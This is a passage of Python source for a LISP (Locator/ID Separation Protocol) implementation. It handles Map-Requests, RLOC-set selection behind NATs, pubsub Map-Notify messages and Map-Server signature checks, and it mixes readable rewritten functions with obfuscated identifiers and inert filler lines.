    """
    ETR handling of a Map-Request: look up the requested EID (or group)
    in the database-mappings, build a Map-Reply, and send it back to the
    requester — encapsulated as an RLOC-probe when the reply must
    traverse a NAT (requester is a known RTR or source port is 0).

    Fixes: lisp_rtr_list.has_key(...) was removed in Python 3; the "in"
    operator is used instead and behaves identically on Python 2.
    """
    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)

    eid_str = map_request.print_prefix()

    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}".format(green(eid_str, False)))
        return

    db_eid_str = db.print_eid_tuple()

    lprint("Found database-mapping EID-prefix {} for requested EID {}".format(green(db_eid_str, False), green(eid_str, False)))

    #
    # Reply to the first ITR-RLOC; when it is a private address and NAT
    # traversal is configured, reply to the outer (translated) source.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source

    nonce = map_request.nonce
    enc = lisp_nonce_echoing
    keys = map_request.keys

    db.map_replies_sent += 1

    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)

    #
    # An RLOC-probe reply to a public RTR (or to a zero source port) must
    # be encapsulated so it passes through the NAT; otherwise send the
    # Map-Reply natively.
    #
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        itr_str = itr_rloc.print_address_no_iid()
        if ((public and itr_str in lisp_rtr_list) or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return

    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
if 1 - 1: I1IiiI + OOooOOo - OOooOOo * O0 + o0oOOo0O0Ooo * OOooOOo
if 48 - 48: ooOoO0o - iII111i + I1ii11iIi11i * I1Ii111 % ooOoO0o * OoO0O00
if 28 - 28: i1IIi / iII111i + OOooOOo
if 89 - 89: Oo0Ooo + II111iiii * OoO0O00 + Oo0Ooo % II111iiii
if 59 - 59: O0 + Oo0Ooo
if 63 - 63: OoO0O00 / I1IiiI / oO0o . Ii1I / i1IIi
if 50 - 50: I11i . I11i % I1IiiI - i1IIi
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl):
    """
    RTR handling of a Map-Request (RLOC-probe case): reply with this
    RTR's own RLOCs at priority 254 so the requester probes us directly.
    """
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address()): itr_rloc = source
    nonce = map_request.nonce

    eid = map_request.target_eid
    group = map_request.target_group

    #
    # Build an RLOC-set from our own IPv4/IPv6 RLOCs, when configured.
    #
    rloc_set = []
    for my_addr in [lisp_myrlocs[0], lisp_myrlocs[1]]:
        if (my_addr == None): continue
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(my_addr)
        rloc_entry.priority = 254
        rloc_set.append(rloc_entry)

    enc = lisp_nonce_echoing
    keys = map_request.keys

    packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
        1440, True, keys, enc, True, ttl)
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
if 38 - 38: I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
if 69 - 69: OoooooooOO
if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
if 52 - 52: II111iiii . iII111i
if 36 - 36: I1IiiI * II111iiii
if 68 - 68: oO0o * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i * i1IIi % OOooOOo
def lisp_get_private_rloc_set(target_site_eid, seid, group):
    """
    When the requesting site and the target site sit behind the same NAT
    (same public RLOC) or share a non-zero site-id, return copies of the
    target's private RLOCs so the sites can talk directly; otherwise
    return the registered RLOC-set unchanged.
    """
    rloc_set = target_site_eid.registered_rlocs

    source_site = lisp_site_eid_lookup(seid, group, False)
    if (source_site == None): return(rloc_set)

    #
    # Find the target site's first public non-RTR RLOC, collecting deep
    # copies of its private RLOCs along the way.
    #
    target_public = None
    private_rlocs = []
    for rloc_entry in rloc_set:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()):
            private_copy = copy.deepcopy(rloc_entry)
            private_rlocs.append(private_copy)
            continue
        target_public = rloc_entry
        break

    if (target_public == None): return(rloc_set)
    target_public = target_public.rloc.print_address_no_iid()

    #
    # Find the source site's first public non-RTR RLOC.
    #
    source_public = None
    for rloc_entry in source_site.registered_rlocs:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()): continue
        source_public = rloc_entry
        break

    if (source_public == None): return(rloc_set)
    source_public = source_public.rloc.print_address_no_iid()

    #
    # No site-id configured: compare public (NAT) addresses.
    #
    site_id = target_site_eid.site_id
    if (site_id == 0):
        if (source_public == target_public):
            lprint("Return private RLOCs for sites behind {}".format(target_public))
            return(private_rlocs)
        return(rloc_set)

    #
    # Site-ids configured: compare them.
    #
    if (site_id == source_site.site_id):
        lprint("Return private RLOCs for sites in site-id {}".format(site_id))
        return(private_rlocs)
    return(rloc_set)
if 48 - 48: oO0o . I1ii11iIi11i
if 59 - 59: IiII - Ii1I
if 62 - 62: OOooOOo * o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo * i11iIiiIii - O0
if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
if 53 - 53: o0oOOo0O0Ooo * Ii1I
if 42 - 42: I11i + iII111i / iIii1I11I1II1
if 1 - 1: O0 - II111iiii
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    """
    Return the subset of 'registered_rloc_set' the Map-Request source
    should see. Priority-254 entries mark RTRs: when the source is
    itself a registered RTR it gets the non-RTR RLOCs; any other source
    gets the site's private RLOCs plus the RTRs. If no RTRs are
    registered at all, the set is returned unchanged.
    """
    rtr_entries = []
    visible_entries = []

    #
    # Determine whether any RTRs are registered and whether the requester
    # is one of them (exact address match on a priority-254 entry).
    #
    source_is_rtr = False
    have_rtrs = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        have_rtrs |= True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        source_is_rtr = True
        break

    if (have_rtrs == False): return(registered_rloc_set)

    #
    # When this system's RTR sits behind a NAT, private registered
    # addresses are unreachable and are filtered out below.
    #
    rtr_behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Partition the set into RTR and non-RTR entries, dropping entries
    # whose (m)priority says "do not use" for this request type.
    #
    for rloc_entry in registered_rloc_set:
        if (rtr_behind_nat and rloc_entry.rloc.is_private_address()): continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_entries.append(rloc_entry)
        else:
            visible_entries.append(rloc_entry)

    #
    # A requesting RTR gets the real RLOC-set.
    #
    if (source_is_rtr): return(visible_entries)

    #
    # Everyone else gets the private RLOCs followed by the RTRs.
    #
    visible_entries = []
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.rloc.is_private_address()): visible_entries.append(rloc_entry)
    visible_entries += rtr_entries
    return(visible_entries)
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
if 82 - 82: ooOoO0o % OOooOOo % Ii1I
if 82 - 82: I1ii11iIi11i
if 52 - 52: i11iIiiIii % I1Ii111 - iII111i / O0 - I1ii11iIi11i / iII111i
if 7 - 7: OoooooooOO . OOooOOo . OOooOOo
if 53 - 53: OOooOOo * OoOoOO00 % iII111i
if 86 - 86: OOooOOo . OOooOOo + IiII - I1ii11iIi11i . OoO0O00
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
 #
 # Record pubsub subscription state: build a lisp_pubsub entry from the
 # requesting ITR's RLOC, source port, nonce, ttl and xtr-id, then file
 # it under the EID-prefix the subscriber asked to be notified about.
 #
 subscription = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
 subscription . add ( reply_eid )
 return
if 15 - 15: iII111i % Oo0Ooo * i1IIi
if 93 - 93: OOooOOo * I11i % oO0o % i11iIiiIii + OoO0O00 + I11i
if 88 - 88: OoOoOO00 + iIii1I11I1II1 + iIii1I11I1II1 . II111iiii % OoO0O00
if 99 - 99: Oo0Ooo - I1Ii111 * OOooOOo
if 95 - 95: o0oOOo0O0Ooo / oO0o + Ii1I - OoooooooOO
if 15 - 15: O0
if 21 - 21: OoO0O00 * iIii1I11I1II1 - iIii1I11I1II1 % OoO0O00 . I1ii11iIi11i
if 19 - 19: i1IIi % Ii1I . OoOoOO00
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
def lisp_convert_reply_to_notify ( packet ) :
 #
 # Rewrite a Map-Reply packet header into a Map-Notify header, keeping
 # the record count (low byte of the first 32-bit word) and the 64-bit
 # nonce, inserting a zeroed 32-bit word (key-id/auth-length field per
 # the header layout — the EID-records that follow are untouched).
 #
 first_word = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
 record_count = first_word & 0xff
 nonce = packet [ 4 : 12 ]
 eid_records = packet [ 12 : : ]

 #
 # Build new first word: Map-Notify type in the top 4 bits plus the
 # preserved record count.
 #
 notify_word = ( LISP_MAP_NOTIFY << 28 ) | record_count
 header = struct . pack ( "I" , socket . htonl ( notify_word ) )
 zero_word = struct . pack ( "I" , 0 )

 return ( header + nonce + zero_word + eid_records )
if 9 - 9: i1IIi - I1Ii111 + I1Ii111
if 81 - 81: II111iiii % I11i % O0 . I1Ii111 % ooOoO0o - O0
if 58 - 58: OoooooooOO . II111iiii . O0 % I1Ii111 / OoooooooOO
if 64 - 64: Oo0Ooo + oO0o . OoO0O00
if 67 - 67: I11i
if 91 - 91: OOooOOo / OoO0O00
if 36 - 36: I1IiiI . iII111i * I1Ii111 . IiII % I1ii11iIi11i
if 44 - 44: I11i % I1ii11iIi11i - OoooooooOO % iII111i
def lisp_notify_subscribers ( lisp_sockets , eid_record , eid , site ) :
 #
 # Send a Map-Notify to every subscriber that registered interest in
 # this EID-prefix via the pubsub cache.  No-op when there are no
 # subscribers for the prefix.
 #
 prefix_str = eid . print_prefix ( )
 if ( prefix_str not in lisp_pubsub_cache ) : return

 for sub in lisp_pubsub_cache [ prefix_str ] . values ( ) :
  itr = sub . itr
  itr_port = sub . port
  itr_str = red ( itr . print_address_no_iid ( ) , False )
  sub_str = bold ( "subscriber" , False )
  xtr_id_str = "0x" + lisp_hex_string ( sub . xtr_id )
  nonce_str = "0x" + lisp_hex_string ( sub . nonce )

  lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( sub_str ,
   itr_str , itr_port , xtr_id_str , green ( prefix_str , False ) , nonce_str ) )

  lisp_build_map_notify ( lisp_sockets , eid_record , [ prefix_str ] , 1 , itr ,
   itr_port , sub . nonce , 0 , 0 , 0 , site , False )
  sub . map_notify_count += 1
 return
if 66 - 66: O0 . iIii1I11I1II1 / OoO0O00 . Ii1I * i1IIi * OoooooooOO
if 26 - 26: iIii1I11I1II1 . IiII * Oo0Ooo * OoOoOO00 * O0
if 25 - 25: iIii1I11I1II1 . iII111i / II111iiii % OoO0O00 / Ii1I
if 82 - 82: Ii1I . I11i - OOooOOo
if 64 - 64: o0oOOo0O0Ooo - I1Ii111 - Oo0Ooo + OoOoOO00
if 6 - 6: IiII * iIii1I11I1II1 + OOooOOo . OoooooooOO
if 30 - 30: iII111i . IiII % O0 + iII111i % Ii1I
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
 ttl , xtr_id ) :
 #
 # Handle a Map-Request that carried the subscribe-bit: store the
 # subscription state, then acknowledge the ITR by converting the
 # already-built Map-Reply payload into a Map-Notify and sending it.
 #
 lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl , xtr_id )

 eid_str = green ( reply_eid . print_prefix ( ) , False )
 itr_str = red ( itr_rloc . print_address_no_iid ( ) , False )
 notify_str = bold ( "Map-Notify" , False )
 xtr_id = "0x" + lisp_hex_string ( xtr_id )
 lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( notify_str ,
  eid_str , itr_str , xtr_id ) )

 #
 # Reuse the Map-Reply contents as the Map-Notify body and transmit.
 #
 notify_packet = lisp_convert_reply_to_notify ( packet )
 lisp_send_map_notify ( lisp_sockets , notify_packet , itr_rloc , port )
 return
if 91 - 91: oO0o - Oo0Ooo % OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: i1IIi % iII111i * I1Ii111
if 36 - 36: I1ii11iIi11i % II111iiii % I1Ii111 / I1ii11iIi11i
if 34 - 34: OoooooooOO * i11iIiiIii
if 33 - 33: II111iiii
if 59 - 59: iIii1I11I1II1 % I11i
if 93 - 93: I1ii11iIi11i
if 50 - 50: ooOoO0o % OoO0O00 % OoO0O00
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
 mr_sport , ecm_source ) :
 #
 # Map-Server processing of a received Map-Request.  Looks up the target
 # EID(-prefix) in the site cache, optionally verifies a Map-Request
 # signature, then either proxy-replies (possibly applying policy), sends
 # a negative Map-Reply, or forwards the Map-Request to one of the site's
 # registered ETRs.  Returns a [eid, group, ddt-action] triple.
 # NOTE(review): identifiers are machine-obfuscated; comments are inferred
 # from the visible calls and constants — confirm against lispers.net docs.
 #
 if 36 - 36: I1IiiI * O0 . IiII / I1Ii111
 if 15 - 15: I11i + iII111i
 if 79 - 79: i11iIiiIii * IiII % iII111i
 if 18 - 18: iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
 if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
 if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
 # Unpack the request: target EID/group, first ITR-RLOC, xtr-id, nonce,
 # default action, and the subscribe (pubsub) flag.
 I111o0oooO00o0 = map_request . target_eid
 oOoooOOO0o0 = map_request . target_group
 iiI1Ii1I = lisp_print_eid_tuple ( I111o0oooO00o0 , oOoooOOO0o0 )
 O00o00O0OO0 = map_request . itr_rlocs [ 0 ]
 oOo0 = map_request . xtr_id
 OO00OO = map_request . nonce
 Ii1II1I = LISP_NO_ACTION
 OooOooOO0000 = map_request . subscribe_bit
 if 100 - 100: i11iIiiIii
 if 54 - 54: O0 * Ii1I + Ii1I
 if 59 - 59: i11iIiiIii % iII111i
 if 54 - 54: I11i . ooOoO0o / OOooOOo % I1Ii111
 if 13 - 13: I11i / O0 . o0oOOo0O0Ooo . ooOoO0o
 # Verify the Map-Request signature when the target is a crypto-hash EID.
 # II1i1iI tracks whether signature verification has passed so far.
 II1i1iI = True
 IIoOo0oooO0 = ( lisp_get_eid_hash ( I111o0oooO00o0 ) != None )
 if ( IIoOo0oooO0 ) :
  oOOo0OoooOo = map_request . map_request_signature
  if ( oOOo0OoooOo == None ) :
   II1i1iI = False
   lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
   if 81 - 81: O0 + oO0o
  else :
   IIiII11i1 = map_request . signature_eid
   iI1Ii1 , Ooo0O00ooO , II1i1iI = lisp_lookup_public_key ( IIiII11i1 )
   if ( II1i1iI ) :
    II1i1iI = map_request . verify_map_request_sig ( Ooo0O00ooO )
   else :
    lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( IIiII11i1 . print_address ( ) , iI1Ii1 . print_address ( ) ) )
   if 79 - 79: I1ii11iIi11i % I1Ii111 % I11i - iII111i * OoOoOO00
   if 48 - 48: O0 + OoOoOO00 - O0
   O0oIiI = bold ( "passed" , False ) if II1i1iI else bold ( "failed" , False )
   lprint ( "EID-crypto-hash signature verification {}" . format ( O0oIiI ) )
 if 4 - 4: I1IiiI - OoO0O00 % o0oOOo0O0Ooo
 if 83 - 83: iII111i % iIii1I11I1II1 / OOooOOo - OoOoOO00
 if 98 - 98: I11i % oO0o . I1IiiI % OoOoOO00
 # A failed signature must not create subscription state.
 if ( OooOooOO0000 and II1i1iI == False ) :
  OooOooOO0000 = False
  lprint ( "Suppress creating pubsub state due to signature failure" )
 if 32 - 32: I1ii11iIi11i / Ii1I
 if 54 - 54: I11i - i11iIiiIii
 if 91 - 91: Ii1I - OoO0O00 - I1IiiI % OoO0O00 . o0oOOo0O0Ooo
 if 85 - 85: ooOoO0o . ooOoO0o % Oo0Ooo . OOooOOo + OOooOOo / I1IiiI
 if 69 - 69: i1IIi + II111iiii / Ii1I
 if 4 - 4: I11i * OoOoOO00 % o0oOOo0O0Ooo % ooOoO0o - I1ii11iIi11i
 if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 * I11i * OoOoOO00
 if 14 - 14: i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
 if 18 - 18: Oo0Ooo % OOooOOo + IiII
 if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
 if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
 if 47 - 47: II111iiii
 if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
 if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
 # Pick the address used for partial-RLOC-set decisions: the ITR-RLOC if
 # its AFI matches the ECM source, otherwise the ECM source itself.
 OOo0oOoOo0ooO = O00o00O0OO0 if ( O00o00O0OO0 . afi == ecm_source . afi ) else ecm_source
 if 98 - 98: iII111i / I1Ii111
 O0oiiii1i1i11I = lisp_site_eid_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
 if 3 - 3: OOooOOo * iIii1I11I1II1 / oO0o . iIii1I11I1II1 . iII111i
 # No site (or only a (*,G) wildcard) covers this EID: negative Map-Reply
 # with a 15-minute TTL and a SITE_NOT_FOUND action for the caller.
 if ( O0oiiii1i1i11I == None or O0oiiii1i1i11I . is_star_g ( ) ) :
  I11oo = bold ( "Site not found" , False )
  lprint ( "{} for requested EID {}" . format ( I11oo ,
   green ( iiI1Ii1I , False ) ) )
  if 74 - 74: Ii1I / iIii1I11I1II1 + OOooOOo . II111iiii
  if 65 - 65: OOooOOo * I11i * Oo0Ooo
  if 21 - 21: Ii1I . iIii1I11I1II1
  if 84 - 84: OOooOOo
  lisp_send_negative_map_reply ( lisp_sockets , I111o0oooO00o0 , oOoooOOO0o0 , OO00OO , O00o00O0OO0 ,
   mr_sport , 15 , oOo0 , OooOooOO0000 )
  if 67 - 67: I1IiiI % OoO0O00 % o0oOOo0O0Ooo % IiII
  return ( [ I111o0oooO00o0 , oOoooOOO0o0 , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
 if 33 - 33: ooOoO0o % I1IiiI
 if 98 - 98: oO0o . o0oOOo0O0Ooo + II111iiii
 IiI1ii1 = O0oiiii1i1i11I . print_eid_tuple ( )
 O0oooOO0O = O0oiiii1i1i11I . site . site_name
 if 70 - 70: oO0o % OoooooooOO * I1IiiI - OoOoOO00 * OoOoOO00 . OOooOOo
 if 9 - 9: iII111i * Oo0Ooo % iII111i % Oo0Ooo * II111iiii
 if 71 - 71: II111iiii + I1ii11iIi11i * II111iiii
 if 59 - 59: OoO0O00
 if 81 - 81: i11iIiiIii
 # Site configuration may demand a signed Map-Request even for non
 # crypto-hash EIDs; verify it here using the same public-key path.
 if ( IIoOo0oooO0 == False and O0oiiii1i1i11I . require_signature ) :
  oOOo0OoooOo = map_request . map_request_signature
  IIiII11i1 = map_request . signature_eid
  if ( oOOo0OoooOo == None or IIiII11i1 . is_null ( ) ) :
   lprint ( "Signature required for site {}" . format ( O0oooOO0O ) )
   II1i1iI = False
  else :
   IIiII11i1 = map_request . signature_eid
   iI1Ii1 , Ooo0O00ooO , II1i1iI = lisp_lookup_public_key ( IIiII11i1 )
   if ( II1i1iI ) :
    II1i1iI = map_request . verify_map_request_sig ( Ooo0O00ooO )
   else :
    lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( IIiII11i1 . print_address ( ) , iI1Ii1 . print_address ( ) ) )
   if 57 - 57: Oo0Ooo * iIii1I11I1II1 - OoOoOO00 % iII111i % I1ii11iIi11i + Ii1I
   if 82 - 82: IiII * Oo0Ooo - iIii1I11I1II1 - i11iIiiIii
   O0oIiI = bold ( "passed" , False ) if II1i1iI else bold ( "failed" , False )
   lprint ( "Required signature verification {}" . format ( O0oIiI ) )
 if 85 - 85: OoooooooOO
 if 37 - 37: OoooooooOO + O0 + I1ii11iIi11i + IiII * iII111i
 if 15 - 15: i11iIiiIii / Oo0Ooo - OOooOOo . IiII
 if 11 - 11: OOooOOo / i1IIi % Oo0Ooo
 if 65 - 65: OOooOOo % I1ii11iIi11i
 if 25 - 25: o0oOOo0O0Ooo - I1Ii111 * I1ii11iIi11i + OoooooooOO
 # Site found but not registered: send a negative Map-Reply scoped to
 # the site prefix (unless more-specifics are accepted) and return.
 if ( II1i1iI and O0oiiii1i1i11I . registered == False ) :
  lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( O0oooOO0O , green ( IiI1ii1 , False ) , green ( iiI1Ii1I , False ) ) )
  if 93 - 93: OoOoOO00 % I1ii11iIi11i * I11i
  if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
  if 73 - 73: OOooOOo * iII111i * OoO0O00
  if 11 - 11: I1Ii111 * II111iiii
  if 3 - 3: Oo0Ooo * OOooOOo
  if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
  if ( O0oiiii1i1i11I . accept_more_specifics == False ) :
   I111o0oooO00o0 = O0oiiii1i1i11I . eid
   oOoooOOO0o0 = O0oiiii1i1i11I . group
  if 98 - 98: I1IiiI * Oo0Ooo
  if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
  if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
  if 95 - 95: OoO0O00 * II111iiii + i1IIi
  if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
  # TTL 1 minute unless the site forces one (high bit marks "forced").
  oo0OOoOO0 = 1
  if ( O0oiiii1i1i11I . force_ttl != None ) :
   oo0OOoOO0 = O0oiiii1i1i11I . force_ttl | 0x80000000
  if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
  if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
  if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
  if 3 - 3: I1ii11iIi11i - O0
  if 46 - 46: iII111i
  lisp_send_negative_map_reply ( lisp_sockets , I111o0oooO00o0 , oOoooOOO0o0 , OO00OO , O00o00O0OO0 ,
   mr_sport , oo0OOoOO0 , oOo0 , OooOooOO0000 )
  if 99 - 99: oO0o
  return ( [ I111o0oooO00o0 , oOoooOOO0o0 , LISP_DDT_ACTION_MS_NOT_REG ] )
 if 85 - 85: I1Ii111 * iIii1I11I1II1 . OoOoOO00
 if 20 - 20: I11i * O0 - OoooooooOO * OOooOOo % oO0o * iII111i
 if 70 - 70: I11i + O0 . i11iIiiIii . OOooOOo
 if 48 - 48: iIii1I11I1II1 * Ii1I - OoooooooOO / oO0o - OoO0O00 / i11iIiiIii
 if 24 - 24: I1IiiI
 # Decide whether to proxy-reply and why (for logging): NAT-forced,
 # config-forced, requested by the ETR, drop-to-PITR, or a configured
 # proxy-reply action string ("drop" vs native-forward).
 O00oO0ooo = False
 OOIIi11iiiIIIII = ""
 oO0OOoOo0O = False
 if ( O0oiiii1i1i11I . force_nat_proxy_reply ) :
  OOIIi11iiiIIIII = ", nat-forced"
  O00oO0ooo = True
  oO0OOoOo0O = True
 elif ( O0oiiii1i1i11I . force_proxy_reply ) :
  OOIIi11iiiIIIII = ", forced"
  oO0OOoOo0O = True
 elif ( O0oiiii1i1i11I . proxy_reply_requested ) :
  OOIIi11iiiIIIII = ", requested"
  oO0OOoOo0O = True
 elif ( map_request . pitr_bit and O0oiiii1i1i11I . pitr_proxy_reply_drop ) :
  OOIIi11iiiIIIII = ", drop-to-pitr"
  Ii1II1I = LISP_DROP_ACTION
 elif ( O0oiiii1i1i11I . proxy_reply_action != "" ) :
  Ii1II1I = O0oiiii1i1i11I . proxy_reply_action
  OOIIi11iiiIIIII = ", forced, action {}" . format ( Ii1II1I )
  Ii1II1I = LISP_DROP_ACTION if ( Ii1II1I == "drop" ) else LISP_NATIVE_FORWARD_ACTION
 if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
 if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
 if 77 - 77: ooOoO0o . II111iiii
 if 41 - 41: IiII
 if 27 - 27: IiII / IiII
 if 91 - 91: Ii1I
 if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
 # Apply a configured policy to a proxy-reply; a non-matching policy
 # implies a drop.  iiII1iI holds the matched policy, if any.
 O0OOO0oO0OO0 = False
 iiII1iI = None
 if ( oO0OOoOo0O and lisp_policies . has_key ( O0oiiii1i1i11I . policy ) ) :
  iIiiI11II11 = lisp_policies [ O0oiiii1i1i11I . policy ]
  if ( iIiiI11II11 . match_policy_map_request ( map_request , mr_source ) ) : iiII1iI = iIiiI11II11
  if 8 - 8: I1ii11iIi11i
  if ( iiII1iI ) :
   O00OOOo0Oo0 = bold ( "matched" , False )
   lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( O00OOOo0Oo0 ,
    iIiiI11II11 . policy_name , iIiiI11II11 . set_action ) )
  else :
   O00OOOo0Oo0 = bold ( "no match" , False )
   lprint ( "Map-Request {} for policy '{}', implied drop" . format ( O00OOOo0Oo0 ,
    iIiiI11II11 . policy_name ) )
   O0OOO0oO0OO0 = True
 if 88 - 88: I11i
 if 36 - 36: iIii1I11I1II1 - ooOoO0o * OoO0O00 * OoO0O00 . II111iiii
 if 49 - 49: O0 + OoO0O00 - I1ii11iIi11i + ooOoO0o
 # Proxy-reply path: build and send the Map-Reply (or pubsub Map-Notify)
 # ourselves instead of forwarding to an ETR.
 if ( OOIIi11iiiIIIII != "" ) :
  lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( iiI1Ii1I , False ) , O0oooOO0O , green ( IiI1ii1 , False ) ,
  # iIii1I11I1II1 * ooOoO0o . ooOoO0o % I1Ii111 % ooOoO0o . ooOoO0o
  OOIIi11iiiIIIII ) )
  if 78 - 78: Oo0Ooo
  iio0OOoO0 = O0oiiii1i1i11I . registered_rlocs
  oo0OOoOO0 = 1440
  # NAT-forced replies: possibly substitute a site-id-scoped private
  # RLOC set, or trim to a partial RLOC set (short 15-min TTL).
  if ( O00oO0ooo ) :
   if ( O0oiiii1i1i11I . site_id != 0 ) :
    Oooo0OOO0oo0o = map_request . source_eid
    iio0OOoO0 = lisp_get_private_rloc_set ( O0oiiii1i1i11I , Oooo0OOO0oo0o , oOoooOOO0o0 )
   if 78 - 78: o0oOOo0O0Ooo . i11iIiiIii % IiII
   if ( iio0OOoO0 == O0oiiii1i1i11I . registered_rlocs ) :
    OOo0I111I = ( O0oiiii1i1i11I . group . is_null ( ) == False )
    i11i1i11ii11I = lisp_get_partial_rloc_set ( iio0OOoO0 , OOo0oOoOo0ooO , OOo0I111I )
    if ( i11i1i11ii11I != iio0OOoO0 ) :
     oo0OOoOO0 = 15
     iio0OOoO0 = i11i1i11ii11I
  if 66 - 66: o0oOOo0O0Ooo
  if 44 - 44: IiII / IiII - iII111i * i11iIiiIii % i11iIiiIii + i11iIiiIii
  if 50 - 50: II111iiii . IiII / O0 . I1ii11iIi11i / OOooOOo % ooOoO0o
  if 90 - 90: OoO0O00 + OOooOOo
  if 64 - 64: o0oOOo0O0Ooo + OoO0O00 % I1Ii111 * I11i * iII111i % I11i
  if 26 - 26: OoO0O00 - II111iiii - o0oOOo0O0Ooo
  if 50 - 50: OoooooooOO
  if 51 - 51: II111iiii - oO0o % OoooooooOO - II111iiii / O0 - OoooooooOO
  # Site-forced TTL overrides the computed one (high bit = forced).
  if ( O0oiiii1i1i11I . force_ttl != None ) :
   oo0OOoOO0 = O0oiiii1i1i11I . force_ttl | 0x80000000
  if 21 - 21: iII111i * o0oOOo0O0Ooo
  if 85 - 85: I1ii11iIi11i . OoOoOO00 . i1IIi % OOooOOo * I11i . I1Ii111
